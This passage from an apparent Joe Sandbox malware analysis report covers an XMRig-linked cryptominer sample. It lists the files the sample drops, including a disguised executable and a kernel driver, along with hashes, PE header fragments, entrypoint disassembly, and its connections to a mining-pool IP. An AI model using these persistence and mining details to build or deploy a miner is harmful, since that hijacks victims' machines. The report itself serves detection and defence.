                      http://crl.cloudflare.com/origin_ca.crlsvchost.exe, 00000027.00000003.2648761950.000001B0C38A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000027.00000003.2549406993.000001B0C38A6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000027.00000002.2670346828.000001B0C38A6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000027.00000002.2670244989.000001B0C386A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000027.00000002.2670282093.000001B0C387F000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        https://xmrig.com/docs/algorithmssvchost.exe, 00000027.00000002.2668768314.0000000140001000.00000040.00000001.00020000.00000000.sdmpfalse
                          		high

                          World Map of Contacted IPs

                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs

                          Public IPs

                          IPDomainCountryFlagASNASN NameMalicious
                          51.89.23.91
                          		unknownFrance
                          		16276OVHFRfalse

                          General Information

                          Joe Sandbox version:41.0.0 Charoite
                          Analysis ID:1557203
                          Start date and time:2024-11-17 19:20:05 +01:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 6m 56s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:44
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:4o8Tgrb384.exe
                          renamed because original name is a hash value
                          Original Sample Name:414d3083ff99da1b26c198f1bcea1b5824f8a083fd57420781e21e539b5bbf1b.exe
                          Detection:MAL
                          Classification:mal100.spyw.evad.mine.winEXE@58/12@1/1
                          EGA Information:
                          • Successful, ratio: 75%
                          HCA Information:Failed
                          Cookbook Comments:
                          • Found application associated with file extension: .exe

                          Warnings

                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                          • Execution Graph export aborted for target svchost.exe, PID 5184 because there are no executed function
                          • Not all processes where analyzed, report is missing behavior information
                          • Report size exceeded maximum capacity and may have missing behavior information.
                          • Report size getting too big, too many NtCreateKey calls found.
                          • VT rate limit hit for: 4o8Tgrb384.exe

                          Simulations

                          Behavior and APIs

                          TimeTypeDescription
                          13:21:03API Interceptor32x Sleep call for process: powershell.exe modified

                          Joe Sandbox View / Context

                          IPs

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          51.89.23.91file.exeGet hashmaliciousXmrigBrowse
                            SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exeGet hashmaliciousXmrigBrowse
                              eqkh9g37Yb.exeGet hashmaliciousXmrigBrowse

                                Domains

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                xmr-eu1.nanopool.orgrtYpMDeKUq.exeGet hashmaliciousXmrigBrowse
                                • 51.89.23.91
                                NH95Vhokye.exeGet hashmaliciousXmrigBrowse
                                • 54.37.137.114
                                ahlntQUj2t.exeGet hashmaliciousXmrigBrowse
                                • 54.37.232.103
                                file.exeGet hashmaliciousXmrigBrowse
                                • 163.172.154.142
                                HmA7s2gaa5.exeGet hashmaliciousXmrigBrowse
                                • 162.19.224.121
                                12Jh49DCAj.exeGet hashmaliciousXmrigBrowse
                                • 51.15.65.182
                                Ky4J8k89A7.exeGet hashmaliciousStealc, Vidar, XmrigBrowse
                                • 51.15.58.224
                                boooba.exeGet hashmaliciousXmrigBrowse
                                • 51.15.58.224
                                2HUgVjrn3O.exeGet hashmaliciousXmrigBrowse
                                • 51.15.58.224
                                SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exeGet hashmaliciousXmrigBrowse
                                • 141.94.23.83

                                ASNs

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                OVHFR4c9ebxnhQk.exeGet hashmaliciousUnknownBrowse
                                • 146.59.45.167
                                XzCRLowRXn.exeGet hashmaliciousUnknownBrowse
                                • 51.77.90.246
                                4c9ebxnhQk.exeGet hashmaliciousUnknownBrowse
                                • 94.23.76.52
                                o4QEzeCniw.exeGet hashmaliciousUnknownBrowse
                                • 51.222.136.218
                                https://ambir.com/all-ambir-drivers/Get hashmaliciousUnknownBrowse
                                • 54.38.113.2
                                Dark_drop_2_pers_lum_clean.exe.bin.exeGet hashmaliciousLummaC, DarkGate, LummaC Stealer, MailPassViewBrowse
                                • 164.132.5.124
                                _DRP12938938231_PDF.jsGet hashmaliciousMint StealerBrowse
                                • 51.91.79.17
                                http://portableapps.comGet hashmaliciousUnknownBrowse
                                • 51.81.32.118
                                http://deepai.orgGet hashmaliciousLiteHTTP BotBrowse
                                • 54.38.113.5
                                xd.arm.elfGet hashmaliciousMiraiBrowse
                                • 198.50.178.226

                                JA3 Fingerprints

                                No context

                                Dropped Files

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                C:\Windows\Temp\iwttnaazwiuc.sys0kToM9fVGQ.exeGet hashmaliciousXmrigBrowse
                                  m2.exeGet hashmaliciousXmrigBrowse
                                    ICBM-noml.exeGet hashmaliciousXmrigBrowse
                                      rtYpMDeKUq.exeGet hashmaliciousXmrigBrowse
                                        n7ZKbApaa3.dllGet hashmaliciousLummaC, XmrigBrowse
                                          ICBM.exeGet hashmaliciousXmrigBrowse
                                            PqSIlYOaIF.exeGet hashmaliciousLummaC, XmrigBrowse
                                              NH95Vhokye.exeGet hashmaliciousXmrigBrowse
                                                Eulen.exeGet hashmaliciousXmrigBrowse
                                                  U9jAFGWgPG.exeGet hashmaliciousPhorpiex, XmrigBrowse

                                                    Created / dropped Files

                                                    C:\ProgramData\zccfxwzedpps\atpljrtdlbzl.exe

                                                    Download File
                                                    Process:C:\Users\user\Desktop\4o8Tgrb384.exe
                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):2629632
                                                    Entropy (8bit):6.533928160435543
                                                    Encrypted:false
                                                    SSDEEP:49152:Vx7T+hZhCasw5syglLJfRY3cSBfqzfp8iu390S8IZKO6Ny:fuZ8Bisy6ZHSpqrpnu39DLj
                                                    MD5:EE26108B32D7B5E5C1F47E51FD11DBA2
                                                    SHA1:0744A751814FE469254D4D8336F32243F8E1B395
                                                    SHA-256:414D3083FF99DA1B26C198F1BCEA1B5824F8A083FD57420781E21E539B5BBF1B
                                                    SHA-512:CF9DD0018B0C6E3C0358455ED8D6544B0ACC4B5E499FC106DCCA76529EDFBCA473DDF3B683013EEE426852A6E6ABF0F5F72D475D6C22B739F78D7C50C4D4F53C
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 63%
                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....0:g.........."......|....'.....@..........@..............................(...........`.................................................(...<............@(..............p(.x...............................(.......8...............X............................text...&z.......|.................. ..`.rdata..p...........................@..@.data...`.'......z'.................@....pdata.......@(.......(.............@..@.00cfg.......P(.......(.............@..@.tls.........`(.......(.............@....reloc..x....p(.......(.............@..B................................................................................................................................................................................................................................................................................................................................................

                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):64
                                                    Entropy (8bit):1.1940658735648508
                                                    Encrypted:false
                                                    SSDEEP:3:Nlllul3nqth:NllUa
                                                    MD5:851531B4FD612B0BC7891B3F401A478F
                                                    SHA1:483F0D1E71FB0F6EFF159AA96CC82422CF605FB3
                                                    SHA-256:383511F73A5CE9C50CD95B6321EFA51A8C6F18192BEEBBD532D4934E3BC1071F
                                                    SHA-512:A22D105E9F63872406FD271EF0A545BD76974C2674AEFF1B3256BCAC3C2128B9B8AA86B993A53BF87DBAC12ED8F00DCCAFD76E8BA431315B7953656A4CB4E931
                                                    Malicious:false
                                                    Preview:@...e.................................&..............@..........

                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0guk4ftb.rxb.ps1

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_33gawnjq.qfa.psm1

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_g3icsgac.p4c.ps1

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_namdnsxv.jbc.psm1

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                    C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):64
                                                    Entropy (8bit):0.34726597513537405
                                                    Encrypted:false
                                                    SSDEEP:3:Nlll:Nll
                                                    MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                    SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                    SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                    SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                    Malicious:false
                                                    Preview:@...e...........................................................

                                                    C:\Windows\Temp\__PSScriptPolicyTest_0wopdp0u.33g.psm1

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                    C:\Windows\Temp\__PSScriptPolicyTest_bdfyvat2.j1j.ps1

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                    C:\Windows\Temp\__PSScriptPolicyTest_j2ycsxsz.ddp.psm1

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                    C:\Windows\Temp\__PSScriptPolicyTest_rmr3inzn.au2.ps1

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                    C:\Windows\Temp\iwttnaazwiuc.sys

                                                    Download File
                                                    Process:C:\ProgramData\zccfxwzedpps\atpljrtdlbzl.exe
                                                    File Type:PE32+ executable (native) x86-64, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):14544
                                                    Entropy (8bit):6.2660301556221185
                                                    Encrypted:false
                                                    SSDEEP:192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
                                                    MD5:0C0195C48B6B8582FA6F6373032118DA
                                                    SHA1:D25340AE8E92A6D29F599FEF426A2BC1B5217299
                                                    SHA-256:11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                                                    SHA-512:AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 5%
                                                    Joe Sandbox View:
                                                    • Filename: 0kToM9fVGQ.exe, Detection: malicious, Browse
                                                    • Filename: m2.exe, Detection: malicious, Browse
                                                    • Filename: ICBM-noml.exe, Detection: malicious, Browse
                                                    • Filename: rtYpMDeKUq.exe, Detection: malicious, Browse
                                                    • Filename: n7ZKbApaa3.dll, Detection: malicious, Browse
                                                    • Filename: ICBM.exe, Detection: malicious, Browse
                                                    • Filename: PqSIlYOaIF.exe, Detection: malicious, Browse
                                                    • Filename: NH95Vhokye.exe, Detection: malicious, Browse
                                                    • Filename: Eulen.exe, Detection: malicious, Browse
                                                    • Filename: U9jAFGWgPG.exe, Detection: malicious, Browse
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................

                                                    Static File Info

                                                    General

                                                    File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                    Entropy (8bit):6.533928160435543
                                                    TrID:
                                                    • Win64 Executable GUI (202006/5) 92.65%
                                                    • Win64 Executable (generic) (12005/4) 5.51%
                                                    • Generic Win/DOS Executable (2004/3) 0.92%
                                                    • DOS Executable Generic (2002/1) 0.92%
                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                    File name:4o8Tgrb384.exe
                                                    File size:2'629'632 bytes
                                                    MD5:ee26108b32d7b5e5c1f47e51fd11dba2
                                                    SHA1:0744a751814fe469254d4d8336f32243f8e1b395
                                                    SHA256:414d3083ff99da1b26c198f1bcea1b5824f8a083fd57420781e21e539b5bbf1b
                                                    SHA512:cf9dd0018b0c6e3c0358455ed8d6544b0acc4b5e499fc106dcca76529edfbca473ddf3b683013eee426852a6e6abf0f5f72d475d6c22b739f78d7c50c4d4f53c
                                                    SSDEEP:49152:Vx7T+hZhCasw5syglLJfRY3cSBfqzfp8iu390S8IZKO6Ny:fuZ8Bisy6ZHSpqrpnu39DLj
                                                    TLSH:C4C533D25C2421F4DA8E10F958651F813F2DB466AB7C71EF91E02F6431A7EE6293E4C2
                                                    File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....0:g.........."......|....'.....@..........@..............................(...........`........................................

                                                    File Icon

                                                    Icon Hash:00928e8e8686b000

                                                    Static PE Info

                                                    General

                                                    Entrypoint:0x140001140
                                                    Entrypoint Section:.text
                                                    Digitally signed:false
                                                    Imagebase:0x140000000
                                                    Subsystem:windows gui
                                                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                    DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                    Time Stamp:0x673A30B7 [Sun Nov 17 18:06:47 2024 UTC]
                                                    TLS Callbacks:0x40001760, 0x1, 0x400017e0, 0x1
                                                    CLR (.Net) Version:
                                                    OS Version Major:6
                                                    OS Version Minor:0
                                                    File Version Major:6
                                                    File Version Minor:0
                                                    Subsystem Version Major:6
                                                    Subsystem Version Minor:0
                                                    Import Hash:de41d4e0545d977de6ca665131bb479a

                                                    Entrypoint Preview

                                                    Instruction
                                                    dec eax
                                                    sub esp, 28h
                                                    dec eax
                                                    mov eax, dword ptr [00007ED5h]
                                                    mov dword ptr [eax], 00000001h
                                                    call 00007F032D09370Fh
                                                    nop
                                                    nop
                                                    nop
                                                    dec eax
                                                    add esp, 28h
                                                    ret
                                                    nop
                                                    inc ecx
                                                    push edi
                                                    inc ecx
                                                    push esi
                                                    push esi
                                                    push edi
                                                    push ebx
                                                    dec eax
                                                    sub esp, 20h
                                                    dec eax
                                                    mov eax, dword ptr [00000030h]
                                                    dec eax
                                                    mov edi, dword ptr [eax+08h]
                                                    dec eax
                                                    mov esi, dword ptr [00007EC9h]
                                                    xor eax, eax
                                                    dec eax
                                                    cmpxchg dword ptr [esi], edi
                                                    sete bl
                                                    je 00007F032D093730h
                                                    dec eax
                                                    cmp edi, eax
                                                    je 00007F032D09372Bh
                                                    dec esp
                                                    mov esi, dword ptr [00009659h]
                                                    nop word ptr [eax+eax+00000000h]
                                                    mov ecx, 000003E8h
                                                    inc ecx
                                                    call esi
                                                    xor eax, eax
                                                    dec eax
                                                    cmpxchg dword ptr [esi], edi
                                                    sete bl
                                                    je 00007F032D093707h
                                                    dec eax
                                                    cmp edi, eax
                                                    jne 00007F032D0936E9h
                                                    dec eax
                                                    mov edi, dword ptr [00007E90h]
                                                    mov eax, dword ptr [edi]
                                                    cmp eax, 01h
                                                    jne 00007F032D09370Eh
                                                    mov ecx, 0000001Fh
                                                    call 00007F032D09ADD4h
                                                    jmp 00007F032D093729h
                                                    cmp dword ptr [edi], 00000000h
                                                    je 00007F032D09370Bh
                                                    mov byte ptr [002817C9h], 00000001h
                                                    jmp 00007F032D09371Bh
                                                    mov dword ptr [edi], 00000001h
                                                    dec eax
                                                    mov ecx, dword ptr [00007E7Ah]
                                                    dec eax
                                                    mov edx, dword ptr [00007E7Bh]
                                                    call 00007F032D09ADCBh
                                                    mov eax, dword ptr [edi]
                                                    cmp eax, 01h
                                                    jne 00007F032D09371Bh
                                                    dec eax
                                                    mov ecx, dword ptr [00007E50h]

                                                    Data Directories

                                                    NameVirtual AddressVirtual Size Is in Section
                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0xa5280x3c.rdata
                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x2840000x180.pdata
                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x2870000x78.reloc
                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_TLS0x90a00x28.rdata
                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x94100x138.rdata
                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IAT0xa6c00x158.rdata
                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                    Sections

                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                    .text0x10000x7a260x7c00b8950986ec9ca7eb5e0cd1241a37ad7dFalse0.5051978326612904data6.173504517183848IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                    .rdata0x90000x1c700x1e00ea4e7223b34c5105ebffa3b9cf1caa34False0.4427083333333333zlib compressed data4.597863869955318IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                    .data0xb0000x2788600x277a006e256ed42cf8dc10b81b3415fa8f59f9unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                    .pdata0x2840000x1800x200dfe97988d419ddba2193306146588841False0.501953125data3.1188095408579493IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                    .00cfg0x2850000x100x200b18c7380298e104adf73576fa46bccc1False0.04296875data0.15127132530476972IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                    .tls0x2860000x100x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                    .reloc0x2870000x780x200518897bf9be51487bef33a20d04055b4False0.224609375data1.418145014287425IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                    Imports

                                                    DLLImport
                                                    msvcrt.dll__C_specific_handler, __getmainargs, __initenv, __iob_func, __set_app_type, __setusermatherr, _amsg_exit, _cexit, _commode, _fmode, _initterm, _onexit, _wcsicmp, _wcsnicmp, abort, calloc, exit, fprintf, free, fwrite, malloc, memcpy, memset, signal, strlen, strncmp, vfprintf, wcscat, wcscpy, wcslen, wcsncmp
                                                    KERNEL32.dllDeleteCriticalSection, EnterCriticalSection, GetLastError, InitializeCriticalSection, LeaveCriticalSection, SetUnhandledExceptionFilter, Sleep, TlsGetValue, VirtualProtect, VirtualQuery

                                                    Network Behavior

                                                    Network Port Distribution

                                                    TCP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Nov 17, 2024 19:21:10.696918964 CET4970510343192.168.2.851.89.23.91
                                                    Nov 17, 2024 19:21:10.701951027 CET103434970551.89.23.91192.168.2.8
                                                    Nov 17, 2024 19:21:10.702033043 CET4970510343192.168.2.851.89.23.91
                                                    Nov 17, 2024 19:21:10.702296019 CET4970510343192.168.2.851.89.23.91
                                                    Nov 17, 2024 19:21:10.707089901 CET103434970551.89.23.91192.168.2.8
                                                    Nov 17, 2024 19:21:11.535377026 CET103434970551.89.23.91192.168.2.8
                                                    Nov 17, 2024 19:21:11.535396099 CET103434970551.89.23.91192.168.2.8
                                                    Nov 17, 2024 19:21:11.535481930 CET4970510343192.168.2.851.89.23.91
                                                    Nov 17, 2024 19:21:11.536799908 CET4970510343192.168.2.851.89.23.91
                                                    Nov 17, 2024 19:21:11.541696072 CET103434970551.89.23.91192.168.2.8
                                                    Nov 17, 2024 19:21:11.778882980 CET103434970551.89.23.91192.168.2.8
                                                    Nov 17, 2024 19:21:11.799969912 CET103434970551.89.23.91192.168.2.8
                                                    Nov 17, 2024 19:21:11.800049067 CET4970510343192.168.2.851.89.23.91
                                                    Nov 17, 2024 19:21:13.240889072 CET103434970551.89.23.91192.168.2.8
                                                    Nov 17, 2024 19:21:13.285979986 CET4970510343192.168.2.851.89.23.91
                                                    Nov 17, 2024 19:21:23.177860022 CET103434970551.89.23.91192.168.2.8
                                                    Nov 17, 2024 19:21:23.223416090 CET4970510343192.168.2.851.89.23.91
                                                    Nov 17, 2024 19:21:33.269067049 CET103434970551.89.23.91192.168.2.8
                                                    Nov 17, 2024 19:21:33.319525003 CET4970510343192.168.2.851.89.23.91
                                                    Nov 17, 2024 19:21:43.226334095 CET103434970551.89.23.91192.168.2.8
                                                    Nov 17, 2024 19:21:43.270272970 CET4970510343192.168.2.851.89.23.91
                                                    Nov 17, 2024 19:21:53.248210907 CET103434970551.89.23.91192.168.2.8
                                                    Nov 17, 2024 19:21:53.301625013 CET4970510343192.168.2.851.89.23.91
                                                    Nov 17, 2024 19:22:03.301476002 CET103434970551.89.23.91192.168.2.8
                                                    Nov 17, 2024 19:22:03.348673105 CET4970510343192.168.2.851.89.23.91
                                                    Nov 17, 2024 19:22:13.450011015 CET103434970551.89.23.91192.168.2.8
                                                    Nov 17, 2024 19:22:13.504698992 CET4970510343192.168.2.851.89.23.91
                                                    Nov 17, 2024 19:22:23.442322969 CET103434970551.89.23.91192.168.2.8
